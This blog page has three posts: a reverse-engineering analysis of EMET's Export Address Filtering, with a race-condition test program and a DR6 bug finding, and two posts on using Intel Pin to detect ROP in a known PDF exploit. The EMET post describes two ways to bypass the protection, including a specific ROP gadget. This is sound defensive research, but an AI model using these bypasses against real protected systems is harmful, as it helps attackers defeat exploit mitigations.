Showing posts with label Exploit. Show all posts

Thursday, March 20, 2014

Reversing EMET's EAF (and a couple of curious findings...)

EMET is a very useful tool that allows a user to configure security protections against some common, well-known attack vectors. In this blog entry I will focus on EAF, pointing out some issues that affect the current implementation. EAF stands for Export Address Filtering and, as the name suggests, this protection controls access to the Export Table of a couple of major system DLLs, in order to make it more difficult for an attacker to obtain the addresses of the APIs when the request comes from outside executable modules (e.g. from a shellcode running from the stack, or from the heap).

Here is a snapshot of the EMET configuration interface, where you can see all the available protections (including EAF):




EMET uses the Shims engine to inject its module inside all the protected processes: if you inspect a process (e.g. with Process Explorer) on which EMET is active, you will notice the presence of EMET.dll, which means that at least one protection is active for that process. So, EMET operates from the inside of the process in order to enable its protections, but, despite this "invasive" approach, I haven't noticed problems in performance or functionality. Some compatibility problems do exist (given the tricky nature of some protections), but they are well documented for all the most common software.

Let's start focusing on EAF itself. First, EMET protects EMET.dll by calling the GetModuleHandleEx API: if as its parameters you specify the flags GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS and GET_MODULE_HANDLE_EX_FLAG_PIN, and an address inside the EMET.dll itself, as a result, the DLL will stay loaded until the process is terminated (no matter how many times FreeLibrary is called).

Then, EMET reads the Export Table of kernel32.dll and of ntdll.dll (the two DLLs being protected) and, in both cases, saves the AddressOfFunctions field (from the IMAGE_EXPORT_DIRECTORY structure) that contains the address at which all the exported APIs addresses are located. Having done that, EMET installs a global Exception Handler by calling the AddVectoredExceptionHandler API, which will be used to filter all the exceptions that occur when a hardware breakpoint is hit. I will describe this Exception Handler routine later.

Now EMET proceeds in activating the protection by forking the execution into two threads.

The main one uses the CreateToolhelp32Snapshot/Thread32First/Thread32Next APIs to get a list of all the running threads of the current process and saves them in an array:

.text:0005486D                 push    0FFFFFFFFh      ; dwMilliseconds
.text:0005486F                 push    array_mutex     ; hHandle
.text:00054875                 call    ds:WaitForSingleObject
.text:0005487B                 mov     eax, thread_count
.text:00054880                 cmp     eax, 256
.text:00054885                 jnb     short loc_54897
.text:00054887                 mov     ecx, [ebp+thread_id]
.text:0005488A                 mov     tid_array[eax*4], ecx
.text:00054891                 inc     thread_count


The second one retrieves all the threads from the array and activates the hardware breakpoints on them in order to protect the AddressOfFunctions fields (one per DLL) mentioned above.
This array has a hardcoded size of 256 DWORDs, but don't be disappointed: it is only a temporary buffer where new threads are added until they are processed, and then removed, by the protector thread. 
Moreover, EMET uses a mutex (actually saved as the first element of the array) to synchronize the access to the thread list, thus ensuring that all the newly added threads are processed before the array fills up with 256 of them:


.text:00054906             Protector_Loop:
.text:00054906                 push    100
.text:00054908                 call    ds:Sleep
.text:0005490E                 push    0FFFFFFFFh
.text:00054910                 push    array_mutex
.text:00054916                 call    ds:WaitForSingleObject
.text:0005491C                 mov     ebx, thread_count
.text:00054922                 test    ebx, ebx
.text:00054924                 jz      short loc_5498B
  ...


Still, there is a curious race condition: some time passes between the creation of a thread, its insertion in the array and the activation of EAF by the protector thread. Because of this delay, newly created threads (including the application's main thread) are not protected by EAF during the first part of their execution.



The Windows scheduler allows each thread to run only in a limited slot of time, after which the execution will be passed to other threads. In this way, in most scenarios, a new thread (including the main one) will run for some time before the execution will eventually yield to the protector thread, that will, then, activate the EAF protection. But what if this thread runs vulnerable code before the scheduler could allow the execution of the protector one? Is that possible? Well, in theory it is and, actually, this is also how I discovered the race condition in the first place. 

I created a little application that accesses the AddressOfFunctions field of the kernel32.dll Export Table from a shellcode loaded outside executable modules (in the heap), prints it and then quits. I also activated EAF from the EMET tool. My application should have crashed, but instead it worked without any problem and I couldn't understand why. Moreover, I made my application print the hardware debug registers, and I noticed that the hardware breakpoints were never set. Debugging EMET.dll I discovered the race condition: so, I added a Sleep() in the entry point of my test application to give the EAF protector thread the time to run, and lo and behold, my application crashed as expected when the AddressOfFunctions field was read from the malicious shellcode. 
The same holds if I run an analogous test on newly created threads, not just the main one: there is a small window of vulnerability at the beginning of every thread, but it's very unlikely that an attacker will ever take advantage of it.

Here is the source code of my test application:

 #include <Windows.h>  
 #include <stdio.h>  
   
 DWORD getApiAddress(void)  
 {  
      DWORD KernelImagebase, *pNames, *pAddresses, pCreateFile = 0;  
      WORD *pOrdinals;  
      IMAGE_DOS_HEADER *pMZ;  
      IMAGE_NT_HEADERS *pPE;  
      IMAGE_EXPORT_DIRECTORY *pExpDir;  
      CHAR *currentName;  
   
      KernelImagebase = (DWORD)LoadLibrary(L"Kernel32.dll");  
   
      pMZ = (IMAGE_DOS_HEADER*)KernelImagebase;  
      pPE = (IMAGE_NT_HEADERS*)(KernelImagebase + pMZ->e_lfanew);  
      pExpDir = (IMAGE_EXPORT_DIRECTORY*)(KernelImagebase + pPE->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);  
   
      pNames = (DWORD*)(KernelImagebase + pExpDir->AddressOfNames);  
      pOrdinals = (WORD*)(KernelImagebase + pExpDir->AddressOfNameOrdinals);  
      // reading AddressOfFunctions is the access that EAF watches  
      pAddresses = (DWORD*)(KernelImagebase + pExpDir->AddressOfFunctions);  
      for(DWORD i = 0; i < pExpDir->NumberOfNames; i++)  
      {  
           currentName = (CHAR*)(KernelImagebase + pNames[i]);  
           if(lstrcmpA(currentName, "CreateFileA") == 0)  
           {  
                // a name index maps to a function index through the ordinals table  
                pCreateFile = (DWORD)(KernelImagebase + pAddresses[pOrdinals[i]]);  
                break;  
           }  
      }  
   
      return pCreateFile;  
 }  
   
 void main(void)  
 {  
      DWORD apiAddress;  
   
      Sleep(2000);          // this delay will fix the race condition!  
   
      // print the debug registers  
   
      CONTEXT myContext;  
      memset(&myContext, 0, sizeof(myContext));  
      myContext.ContextFlags = CONTEXT_ALL;  
      HANDLE hThread = GetCurrentThread();  
      if(!GetThreadContext(hThread, &myContext)){  
           printf("cannot get thread context \n");  
      }  
      printf("main D0: %08x, D1: %08x, D2: %08x, D3: %08x\n",   
           myContext.Dr0, myContext.Dr1, myContext.Dr2, myContext.Dr3);  
   
      // test1: checking the export table of kernel32.dll from this executable module  
   
      apiAddress = getApiAddress();  
      printf("Test1 CreateFileA function: %08x \n", apiAddress);  
   
      // test2: checking the export table of kernel32.dll from the heap  
   
      DWORD functionSize, pMain, pgetApiAddress;  
   
      pMain = DWORD(&main);  
      pgetApiAddress = DWORD(&getApiAddress);  
      functionSize = pMain - pgetApiAddress;  
   
      BYTE *shellcode = (BYTE*)malloc(functionSize);  
      memcpy(shellcode, (BYTE*)pgetApiAddress, functionSize);  
   
      __asm  
      {  
           mov  ebx, shellcode  
           call  ebx  
           mov  apiAddress, eax  
      }  
   
      free(shellcode);  
   
      printf("Test2 CreateFileA function: %08x \n", apiAddress);  
   
      getchar();  
 }  


Note: when you compile this code (I used Visual Studio), you must disable all the optimizations to avoid changes to the code layout, and also remove DEP from the linker options.

"test1" retrieves the address of the CreateFileA API from inside the executable module; "test2" does the same from the heap.

If you don't add the Sleep(2000) in the main() function, you will get this output:

main D0: 00000000, D1: 00000000, D2: 00000000, D3: 00000000
Test1 CreateFileA function: 7649bde6
Test2 CreateFileA function: 7649bde6


Notice how the debug registers are all set to zero and both tests ran successfully.
If instead you keep the Sleep(2000) in the code, you will get:

main D0: 7651fa5c, D1: 77e40204, D2: 00000000, D3: 00000000
Test1 CreateFileA function: 7649bde6


As you can see, the debug registers are set and the EAF protection is active, therefore the application crashes when running the second test:



I think that a better use of the synchronization objects could avoid this race condition: for instance, implementing these routines with a critical section and two events would probably have been a safer alternative.


In this implementation, the main thread and every additional thread that is created add themselves to the thread array (processed by the protector thread). The code that does this runs inside a critical section: this ensures that, if multiple threads are created, only one at a time runs the code that adds itself to the thread array. Also, a critical section is a cheaper synchronization object than the mutex used in the EMET implementation.
The protector thread waits on "event 1", which is an event object: it therefore does not waste CPU cycles looping continuously, as the current EMET implementation does, and only wakes up and uses the CPU when a new thread is created. A new thread adds itself to the thread array and then signals "event 1", waking up the protector thread. The new thread then stops and waits for "event 2". Meanwhile, the protector thread has time to process the thread array and, because of the structure of the code, can be sure that no other thread is modifying it. Once EAF is activated, the protector thread signals "event 2" and goes back to waiting for "event 1". The signaled "event 2" wakes up the new thread, which then continues its normal execution.

This implementation has several advantages over EMET's:

  • The protector thread only uses resources when it has to.
  • Only one thread at a time modifies the thread array, which removes the need for an array in the first place: the code could use a single variable, avoiding both the arbitrary size of 256 and the rare but possible condition of the array filling up before the protector thread runs.
  • The new thread is guaranteed to be protected when it reaches the user code, avoiding the small window of vulnerability described in EMET's implementation.
I have not tested this code, but it should work and should not suffer from deadlocks. This could also be implemented in other ways, but you get the point I'm trying to make: you can use proper synchronization to make the code cleaner, more efficient and more elegant.
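To make the handshake concrete, here is a minimal portable sketch of the idea. It is not EMET code and not Win32 code: a std::mutex stands in for the critical section, one condition variable with two flags stands in for "event 1" and "event 2", and a vector of flags stands in for the per-thread debug registers. All the names (Handshake, register_and_wait, protector_loop, count_protected_at_entry) are hypothetical.

```cpp
#include <atomic>
#include <cassert>
#include <condition_variable>
#include <cstddef>
#include <functional>
#include <mutex>
#include <thread>
#include <vector>

struct Handshake {
    std::mutex registration;          // stands in for the critical section
    std::mutex state;                 // guards the fields below
    std::condition_variable changed;
    bool request = false;             // "event 1": a thread asks for protection
    bool granted = false;             // "event 2": protection is now active
    bool stop = false;                // lets the sketch shut down cleanly
    int pending = -1;                 // single slot instead of a 256-entry array
    std::vector<char> is_protected;   // stands in for the per-thread debug registers
};

// Called by each new thread before it reaches user code.
void register_and_wait(Handshake& h, int id) {
    assert(id >= 0 && static_cast<std::size_t>(id) < h.is_protected.size());
    std::lock_guard<std::mutex> one_at_a_time(h.registration);
    std::unique_lock<std::mutex> lock(h.state);
    h.pending = id;
    h.request = true;                                   // signal "event 1"
    h.changed.notify_all();
    h.changed.wait(lock, [&h] { return h.granted; });   // wait for "event 2"
    h.granted = false;
}

// Body of the protector thread: sleeps until a thread registers itself.
void protector_loop(Handshake& h) {
    std::unique_lock<std::mutex> lock(h.state);
    for (;;) {
        h.changed.wait(lock, [&h] { return h.request || h.stop; });
        if (!h.request) return;                 // stop requested, nothing pending
        h.is_protected[h.pending] = 1;          // where EAF would be activated
        h.request = false;
        h.granted = true;                       // signal "event 2"
        h.changed.notify_all();
    }
}

// Starts thread_count workers and counts how many were already protected
// when they reached their "user code".
int count_protected_at_entry(int thread_count) {
    Handshake h;
    h.is_protected.assign(static_cast<std::size_t>(thread_count), 0);
    std::atomic<int> protected_at_entry{0};
    std::thread protector(protector_loop, std::ref(h));
    std::vector<std::thread> workers;
    for (int id = 0; id < thread_count; ++id) {
        workers.emplace_back([&h, &protected_at_entry, id] {
            register_and_wait(h, id);
            if (h.is_protected[id]) ++protected_at_entry;   // "user code" starts here
        });
    }
    for (std::thread& worker : workers) worker.join();
    {
        std::lock_guard<std::mutex> lock(h.state);
        h.stop = true;
    }
    h.changed.notify_all();
    protector.join();
    return protected_at_entry.load();
}
```

Calling count_protected_at_entry(8) should return 8: no worker gets past register_and_wait() until the protector has processed it, which is exactly the property that the polling loop with Sleep(100) cannot give.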

Now let's go back to the second thread: how exactly is EAF implemented? Let's recall that the hardware breakpoints are set by using the CPU debug registers.
EMET looks for every entry in the threads list, then successively opens and suspends each thread in order to modify their contexts using the SetThreadContext API.

As you can see from the image above, the AddressOfFunctions fields of the Export Tables of kernel32.dll and ntdll.dll are used to fill the DR0 and DR1 registers, while some appropriate flags are set in DR7.

These flags are:
  • L0, L1 used to activate the local breakpoints (meaning that they only work in the current thread);
  • LE used for backward compatibility reasons;
  • R/W0, R/W1 used to indicate if the breakpoint is set on read, write, or execute operations;
  • LEN0, LEN1 used to specify the size of the data on which the breakpoint acts.

In short: L0, L1, LE are set to 1 (which means that these flags are enabled); R/W0, R/W1 are set to 11 (which means that a breakpoint is set on data reads or writes); LEN0, LEN1 are set to 11 (referring to 4-byte-long breakpoints).
When these modifications are done, the thread is resumed and the EAF protection becomes active.
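As a quick sanity check of the flags listed above, the following sketch builds the corresponding DR7 value from the bit positions documented in the Intel manuals (L0 and L1 at bits 0 and 2, LE at bit 8, R/W and LEN fields starting at bit 16). The helper names are mine, and the sketch only covers the flags mentioned here: EMET may set or preserve other bits that I have not listed.

```cpp
#include <cassert>
#include <cstdint>

// Local enable bit for breakpoint n (L0..L3 live at bits 0, 2, 4, 6).
inline std::uint32_t dr7_local_enable(unsigned n) {
    assert(n < 4);
    return 1u << (2 * n);
}

// R/Wn field: 2 bits starting at bit 16 + 4n (11b = break on data reads or writes).
inline std::uint32_t dr7_rw(unsigned n, std::uint32_t bits) {
    assert(n < 4 && bits < 4);
    return bits << (16 + 4 * n);
}

// LENn field: 2 bits starting at bit 18 + 4n (11b = 4-byte breakpoint).
inline std::uint32_t dr7_len(unsigned n, std::uint32_t bits) {
    assert(n < 4 && bits < 4);
    return bits << (18 + 4 * n);
}

const std::uint32_t kDr7LocalExact = 1u << 8;   // LE

// DR7 value for two 4-byte read/write breakpoints in DR0 and DR1.
std::uint32_t eaf_dr7_value() {
    const std::uint32_t kReadWrite = 3;   // binary 11
    const std::uint32_t kFourBytes = 3;   // binary 11
    std::uint32_t dr7 = kDr7LocalExact;
    for (unsigned n = 0; n < 2; ++n) {
        dr7 |= dr7_local_enable(n) | dr7_rw(n, kReadWrite) | dr7_len(n, kFourBytes);
    }
    return dr7;
}
```

With these inputs eaf_dr7_value() evaluates to 0x00FF0105: 0x105 for L0, L1 and LE, and 0xFF0000 for the four two-bit fields.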

If you are interested in digging into the debug registers and how Windows handles them, I suggest reading this article by Alex Ionescu.

Our description is now almost complete: the only missing piece is the function installed as the Exception Handler. Let's briefly recall that a function passed as a Vectored Exception Handler must have the following prototype:
LONG CALLBACK VectoredHandler(
  _In_  PEXCEPTION_POINTERS ExceptionInfo
);

In particular, EMET accesses ExceptionInfo->ExceptionRecord->ExceptionFlags to filter the exception itself, making sure that it's a Single Step one (remember that when a hardware breakpoint is hit, the generated exception is of type Single Step). If it is, EMET disables all the active hardware breakpoints (that is, it clears the L0 and L1 flags in DR7). 

Then, it reads the context at the time the exception happened through ExceptionInfo->ContextRecord, and checks the four lowest bits in DR6 (B0 to B3): these bits indicate that a hardware breakpoint condition was met when a Single Step exception was raised (to distinguish it from the ones being generated when the Trap Flag is set).
However, I'm quite sure that there's a little bug in this check:

.text:000546C4                 test    byte ptr [eax+CONTEXT.Dr6], 11h ; bug! 11h should be 3
.text:000546C8                 jz      short not_handled
.text:000546CA                 push    [eax+CONTEXT._Eip] ; reg_eip
.text:000546D0                 call    is_in_module
.text:000546D5                 test    eax, eax
.text:000546D7                 jnz     short not_handled
.text:000546D9                 push    edi
.text:000546DA                 push    1
.text:000546DC                 call    report_protection
.text:000546E1                 cmp     status_exploitaction, 1
.text:000546E8                 pop     ecx
.text:000546E9                 pop     ecx
.text:000546EA                 jnz     short not_handled
.text:000546EC                 push    1
.text:000546EE                 push    STATUS_STACK_BUFFER_OVERRUN
.text:000546F3                 push    dword ptr [edi+4]
.text:000546F6                 call    report_error_and_terminate
.text:000546FB not_handled:
  ...


In fact, EMET tests DR6 against 11 hex, which is 10001 in binary, corresponding to B0 and the undocumented 5th bit that, according to Intel's manuals, is always set to 1. I believe that this is a typo, and that the intended mask was 11 in binary (3 hex), that is, both B0 and B1. 
This is not a serious issue, because DR1 is checked anyway, but it's really useless to let EMET handle a breakpoint that is not actually set. 
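The difference between the two masks is easy to see with a few sample values. The sketch below mimics the "test byte ptr" instruction on the low byte of DR6; the helper name and the sample DR6 values are illustrative, and the first two samples take for granted that bit 4 reads as 1, as stated above.

```cpp
#include <cassert>
#include <cstdint>

const std::uint8_t kMaskInEmet   = 0x11;   // B0 | bit 4, as found in the disassembly
const std::uint8_t kMaskProposed = 0x03;   // B0 | B1, the fix suggested above

// Equivalent of "test byte ptr [dr6], mask" followed by a check of ZF:
// returns true when the handler would go on to inspect EIP.
bool breakpoint_reported(std::uint32_t dr6, std::uint8_t mask) {
    assert(mask != 0);
    return (static_cast<std::uint8_t>(dr6) & mask) != 0;
}
```

With a DR6 low byte of 0x10 (no breakpoint hit, bit 4 set) the 0x11 mask still reports a hit while the 0x03 mask does not. With 0x12 (B1 hit) both report a hit, but the 0x11 mask only does so because of bit 4: if that bit were ever clear (0x02), a hit on DR1 would be missed entirely.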

If one of the two hardware breakpoints was hit when the exception occurred (which may always be the case because of the buggy TEST instruction), EMET checks the value of the EIP register at that time (through ExceptionInfo->ContextRecord->Eip) and uses GetModuleHandleEx to verify whether the instruction that caused the Single Step exception belongs to an executable module. If it doesn't, the error is logged and, if "status_exploitaction" is set (this variable corresponds to the "Stop on exploit/Audit only" option in EMET's settings panel), a STATUS_STACK_BUFFER_OVERRUN is reported (through ExceptionInfo->ExceptionRecord->ExceptionCode), the exception is left unhandled and the process is terminated. In all the other cases (that is, if neither of the two bits in DR6 is set, if the instruction reported in EIP does belong to an executable module, or if "status_exploitaction" isn't set), EMET clears all the bits in DR6 and sets the L0 and L1 flags in DR7 again to let execution resume as if nothing had happened.

Our journey through the EAF implementation is now over, but I would like to discuss briefly a couple of methods to bypass it. As declared by Microsoft, EAF wasn't meant as a definitive protection against unwanted access to the APIs addresses, but more as an obstacle for existing shellcodes.

One simple way to obtain such information, without any need to access the Export Table, is to use the Import Table instead. In particular, you can parse the Import Table of a DLL that is * importing * the desired API from kernel32.dll, or ntdll.dll and look for the OriginalFirstThunk and FirstThunk fields in the IMAGE_IMPORT_DESCRIPTOR structure. For example, User32.dll is loaded in almost every running process, and it imports both the LoadLibrary and GetProcAddress APIs, which are commonly used in shellcodes to get the addresses of other APIs.

Another method to bypass EAF is to use a specially crafted ROP gadget just to retrieve the AddressOfFunctions value. In this way, since you are reading the Export Table from a gadget that lies within an executable module, EMET won't detect anything suspicious and you can then find the addresses of all the needed APIs. Of course, EMET performs some security checks against ROP too, but since we need only one gadget it's not too difficult to find one that exploits the protection itself (or else, you may want to use a JOP gadget). For example, a shellcode may parse the Export Table of a module in order to find the pointer to the AddressOfFunctions field, put this pointer in the EAX register and then call a code gadget that does the following:

MOV       EAX, [EAX]
RET


This gadget is very short, it only requires three bytes of opcodes (8B 00 C3), so it should be very easy to find it inside most executable modules.
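Looking for such a gadget is just a byte search. Here is a small sketch that scans a buffer (standing in for the bytes of a module's code section, however you obtained them) for the 8B 00 C3 sequence; the function names are hypothetical.

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Returns the offset of the first occurrence of pattern in image, or -1.
std::ptrdiff_t find_bytes(const std::vector<std::uint8_t>& image,
                          const std::vector<std::uint8_t>& pattern) {
    assert(!pattern.empty());
    std::vector<std::uint8_t>::const_iterator hit =
        std::search(image.begin(), image.end(), pattern.begin(), pattern.end());
    return hit == image.end() ? -1 : hit - image.begin();
}

// Looks for "MOV EAX, [EAX] / RET" (8B 00 C3).
std::ptrdiff_t find_mov_eax_ret(const std::vector<std::uint8_t>& image) {
    static const std::vector<std::uint8_t> gadget = {0x8B, 0x00, 0xC3};
    return find_bytes(image, gadget);
}
```

Note that the match does not need to start on an instruction boundary of the original code: any place where these three bytes appear inside an executable module is usable as a return target.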

These are just two simple ideas that came to mind; of course, they are nothing new and you can surely find other ways to implement the trick. Moreover, both methods assume that you have already got rid of DEP and ASLR, which are the real pain when writing an exploit.

Note: the analysis was originally written in September 2013 for version 4.0, but it still holds for current version 4.1.



Thursday, March 21, 2013

Binary Instrumentation for Exploit Analysis Purposes (part 2)

Introduction.

This is the second part of the article about binary instrumentation for exploit analysis purposes and this time we will discuss a real pdf exploit: a Stack-based buffer overflow in CoolType.dll (CVE-2010-2883). You can retrieve it from the metasploit module exploit/windows/fileformat/adobe_cooltype_sing .

In order to bypass DEP, this exploit makes use of Heap Spraying to run its ROP shellcode. On the other hand, our goal is to come closer to the point where the vulnerability occurs, so one clever thing to do is to use Pintool to detect the ROP itself.

To do that, we can simply check whether the instruction executed after a RET is located right after a CALL, but be aware that this test alone can lead to false positives. A better test would be to check whether this condition fails three times in a row, but this gives rise to some problems with Pin that we will discuss later.
Another method to detect ROP is to monitor the ESP register and look for the "0c0c0c0c" value, but inspecting the register with Pin is very slow and will degrade the performance of your Pintool. So we won't implement this one.
Finally, one last check is to log the "pop ESP" instruction, that is a common ROP gadget employed right before the ROP shellcode itself.


Detecting the ROP with a Pintool.

Here is the function to detect the ROP:

#define LAST_EXECUTED 1000

ADDRINT LastExecutedBuf[LAST_EXECUTED];
UINT32 LastExecutedPos = 0;
UINT32 PreviousOpcode;
char TempString[12];

#define     PREV_OPCODE(__dist) (((UINT16*)(AddrEip - __dist))[0])

typedef struct _OPC_CHECK  
{
 UINT8 Delta;
 UINT16 Opcode;
} OPC_CHECK;

OPC_CHECK OpcCheck[] = 
{
 6, 0x15ff, 2, 0x12ff, 2, 0x11ff, 2, 0x13ff, 2, 0x17ff, 2, 0x16ff, 2, 0x10ff, 
 3, 0x55ff, 3, 0x50ff, 3, 0x51ff, 3, 0x52ff, 3, 0x53ff, 4, 0x54ff, 3, 0x55ff, 
 3, 0x56ff, 3, 0x57ff, 3, 0x59ff, 6, 0x95ff, 6, 0x97ff, 6, 0x76ff, 6, 0x96ff, 
 6, 0x94ff, 6, 0x93ff, 6, 0x92ff, 6, 0x91ff, 6, 0x90ff, 7, 0x14ff, 7, 0x94ff, 
 3, 0x14ff, 4, 0x54ff, 2, 0xd0ff, 2, 0xd1ff, 2, 0xd2ff, 2, 0xd3ff, 2, 0xd4ff, 
 2, 0xd5ff, 2, 0xd6ff, 2, 0xd7ff, 0, 0
};

char* QuickDwordToString(char *String, UINT32 Value)
{
 int i;
 UINT32 TempVal = Value;
 UINT8 TempByte;

 for(i = 0; i < 8; i++)
 {
  TempByte = (TempVal & 0xF) + 0x30;
  if(TempByte > 0x39) TempByte += 7;
  String[7-i] = TempByte;
  TempVal >>= 4;
 }

 return String;
}

VOID DetectPopEsp(ADDRINT AddrEip, UINT32 Opcode) 
{
 UINT32 i, k;

 if(PreviousOpcode == 557 &&   // int for RET
  AddrEip < 0x70000000 &&
  ((UINT8*)(AddrEip-5))[0] != 0xE8)
 {
  k = 0;
  while(OpcCheck[k].Delta != 0)
  {
   if( PREV_OPCODE(OpcCheck[k].Delta) == OpcCheck[k].Opcode)
    break;

   k++;
  }

  if(OpcCheck[k].Delta == 0)
  {
   fprintf(OutTrace, "%s RETurned here, but not after call\n", QuickDwordToString(TempString, AddrEip));
  }
 }

 if(Opcode == 486)   // int for POP
 {
  if(((UINT8*)AddrEip)[0] == 0x5C)
  {
   fprintf(OutTrace, "%s  POP ESP DETECTED!!\n", QuickDwordToString(TempString, AddrEip)); 
   fprintf(OutTrace,"Dumping list of previously executed EIPs \n");
   // dump last executed buffer on file
   for(i = LastExecutedPos; i < LAST_EXECUTED; i++)
   {
    fprintf(OutTrace, "%s\n", QuickDwordToString(TempString, LastExecutedBuf[i])); 
   }
   for(i = 0; i < LastExecutedPos; i++)
   {
    fprintf(OutTrace, "%s\n", QuickDwordToString(TempString, LastExecutedBuf[i])); 
   }
   fprintf(OutTrace, "%s\n", QuickDwordToString(TempString, AddrEip)); 
   fflush(OutTrace);
  }
 }

 LastExecutedBuf[LastExecutedPos] = AddrEip;
 LastExecutedPos++;
 if(LastExecutedPos >= LAST_EXECUTED)
 {
  // circular logging
  LastExecutedPos = 0;
 }

 PreviousOpcode = Opcode;
}

Include it in the source code of the basic Pintool provided in the first part of the article and use the following line:

INS_InsertCall(Ins, IPOINT_BEFORE, (AFUNPTR)DetectEip, IARG_INST_PTR, IARG_UINT32, INS_Opcode(Ins), IARG_END);

in the "Instruction()" function to call the "DetectEip()" function before every instruction is executed.

Also, add these lines:

UINT32 Opcode;

va_list VaList;
va_start( VaList, AddrEip);

Opcode = va_arg(VaList, UINT32);

va_end(VaList);

DetectPopEsp(AddrEip, Opcode);


in the "DetectEip()" function (where specified by the comments).

Now a brief description of what the code does. Basically, this Pintool looks for two opcodes: the one corresponding to RET (Pin code 557) and the one corresponding to POP (Pin code 486).

If a RET is encountered, the Pintool follows it and checks if the previous opcode is a CALL, looking for the E8 opcode or the ones provided in the "OpcCheck[].Opcode" array (the list may not be complete, but while testing it was reasonably accurate). In case it's not, it notifies the user with the message: "*Address* RETurned here, but not after call".
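The same check can be sketched on a plain byte buffer, which makes it easy to try outside of Pin. The code below is only an illustration: the function and type names are mine, the table contains just a handful of the FF /2 call encodings listed in "OpcCheck[]", and, unlike the Pintool, it checks the buffer bounds before looking backwards.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// An indirect call encoded as FF <modrm> ..., "length" bytes long in total.
struct IndirectCall {
    std::uint8_t length;
    std::uint8_t modrm;
};

// A small subset of the encodings checked by the Pintool.
static const IndirectCall kIndirectCalls[] = {
    {6, 0x15},   // call dword ptr [disp32]
    {2, 0x10},   // call dword ptr [eax]
    {3, 0x50},   // call dword ptr [eax+disp8]
    {6, 0x90},   // call dword ptr [eax+disp32]
    {2, 0xD0},   // call eax
};

// True if the bytes right before ret_target look like a CALL instruction.
bool returns_after_call(const std::vector<std::uint8_t>& code, std::size_t ret_target) {
    assert(ret_target <= code.size());
    // call rel32: E8 followed by a 4-byte displacement
    if (ret_target >= 5 && code[ret_target - 5] == 0xE8) return true;
    for (const IndirectCall& form : kIndirectCalls) {
        if (ret_target >= form.length &&
            code[ret_target - form.length] == 0xFF &&
            code[ret_target - form.length + 1] == form.modrm) {
            return true;
        }
    }
    return false;
}
```

As in the Pintool, this is a heuristic: data bytes that happen to look like a CALL make a gadget pass the check, and call encodings missing from the table produce false alarms.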

If a POP is encountered, it checks if it is a "POP ESP" and, in case it is, it notifies the user by printing "*Address* POP ESP DETECTED!!" and dumps the last executed instructions to file.

That's it. You are finally ready to compile the Pintool and run it within Adobe Acrobat Reader to analyse the PDF exploit.


Analyzing the output

Here is an excerpt from the output produced by the Pintool:

Exception handler address: 7C91EAEC 
Starting Pintool
Loading module C:\Programmi\Adobe\Reader 9.0\Reader\AcroRd32.exe 
Main exe Base: 00400000  End: 00453FFF
Loading module C:\WINDOWS\system32\kernel32.dll 
Module Base: 7C800000 
Module end: 7C8FEFFF 
Loading module C:\WINDOWS\system32\ntdll.dll 
Module Base: 7C910000 
Module end: 7C9C5FFF 
Starting thread 0
...
0D6D8192 RETurned here, but not after call
02D43FA5 RETurned here, but not after call
22326DB0 RETurned here, but not after call
5B18174F RETurned here, but not after call
08171CF0 RETurned here, but not after call
08171D47 RETurned here, but not after call
06066EED RETurned here, but not after call
0633DE6B RETurned here, but not after call
...
4A82A714 RETurned here, but not after call
4A82A714  POP ESP DETECTED!!
Dumping list of previously executed EIPs 
0803DDC6
0803DDCA
0803DDCC
0803DDCD
...
0808B304
0808B305
0808B307
0808B308
4A80CB38
4A80CB3E
4A80CB3F
4A82A714


From the log above we can see all the modules being loaded and threads being created. Then, we notice some false positives: these are legitimate RETs, which don't return to an instruction after a CALL.
Finally, we get to the part where both checks are detected: the code returns to an instruction not located after a call and a "POP ESP" instruction is executed.

In particular, the last logged EIPs correspond to the following ROP gadgets:

 4A80CB38   81C5 94070000    ADD EBP,794
 4A80CB3E   C9               LEAVE
 4A80CB3F   C3               RETN

 4A82A714   5C               POP ESP
(4A82A715   C3               RETN)


So we have located where the exploit occurs (i.e. the address "0808B308"): not bad!

Note that the last instruction reported here (the RETN between parentheses) is not logged by the Pintool because a crash happened right after its execution... but...


...Why???

As I said before, this exploit makes use of Heap Spraying. In particular, we can see it by debugging Adobe Acrobat Reader while Pin is not instrumenting it and setting a breakpoint on address "0808B308". Now, if we open the PDF exploit and leave the debugger running, we can inspect the memory when the code hits the breakpoint:





This is exactly what we were expecting: you can see the ROP shellcode at "0c0c0c0c" and the Heap Spraying all around. On the other hand, if we debug Adobe Acrobat Reader while Pin is instrumenting it, we obtain:




So... no ROP, nor Heap Spraying... but the blocks of memory are still allocated. Who has allocated them?
To get the answer we need to look inside the code window:



... It's Pin itself!
Pin allocates a lot of memory to perform binary instrumentation, occupying also the addresses usually employed by the Heap Spraying. This means that when the ROP shellcode is executed, it's not located where it is supposed to be and this will result in Adobe Acrobat Reader crashing.


Another problem I ran into is that even when I modified the Pintool to force the exploit to work with the shellcode placed at an address other than 0x0C0C0C0C, the exploit still crashed.
This time I could see it run all the ROP shellcode, which allocates a block of executable memory, copies itself to it and then jumps to it.

However, this executable shellcode (not ROP) tried to decrypt (and therefore overwrite) itself causing a memory access violation and making the instrumented shellcode crash. 

I haven't investigated the problem yet, but it seems that the instrumented shellcode is placed in an area that is read only, therefore the self decryption failed when writing the decrypted bytes back to the shellcode memory. 

Sunday, March 10, 2013

Binary Instrumentation for Exploit Analysis Purposes (part 1)

Introduction.

This article is about binary instrumentation over various exploit scenarios. In particular, we are going to use Pin, a tool developed by Intel, to show how this approach can help with the analysis.

Pin is used to create dynamic program analysis tools, the so-called "Pintools". Once executed, a Pintool acts almost like a virtual machine that runs the code from a target executable image and rebuilds it by adding the code you need to perform your own analysis. For example, you can install a callback that is invoked every time a single instruction is executed, inspect registers, alter the context and so on.

Note: I've tested the whole work using Windows XP 32 bit and Visual Studio 2010.


How to compile and execute a Pintool.


The simplest way to compile a Pintool is to use the Visual Studio project provided by Intel, located in the Pin folder at: \source\tools\MyPinTool .

To run it, simply type: pin -t <your_pintool.dll> -- <application_path>.
In this way your Pintool will be executed within the application you want to test.


How to code a Pintool: a (very) short description.

A Pintool begins with a standard initialization of the Pin engine by using the "PIN_Init()" function; then, you need to register the callbacks for the events you want to handle. 
For instance, you can use:
  • "INS_AddInstrumentFunction()" to register a callback that is invoked at every executed instruction;
  • "IMG_AddInstrumentFunction()" to register a callback that notifies you every time an executable module is loaded;
